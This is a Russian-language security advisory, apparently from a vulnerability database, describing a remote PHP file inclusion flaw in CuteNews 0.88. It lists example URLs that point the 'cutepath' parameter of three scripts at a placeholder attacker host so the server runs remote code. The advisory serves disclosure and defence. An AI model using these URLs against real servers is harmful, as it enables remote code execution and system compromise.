Дата публикации: | 03.03.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 4354 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | CuteNews 0.x |
Описание: | Уязвимость включения файла обнаружена в CuteNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системе на целевом сервере.
Сообщается, что несколько сценариев включают файлы, не подтверждая правильность местоположения включенного файла. Удаленный пользователь может создать URL, который определяет удаленное местоположение для 'config.php' и 'news.txt' файлов, чтобы заставить сервер выполнить дистанционно расположенный PHP файл. Уязвимы сценарии 'shownews.php', 'search.php', и 'comments.php': http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTAC KER]/ http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/ где http://[ATTACKER]/config.php или http://[ATTACKER]/news.txtЛюбые команды будут выполнены с привилегиями Web сервера. Уязвимость обнаружена в CuteNews 0.88 |
Ссылки: | PHP code injection in CuteNews |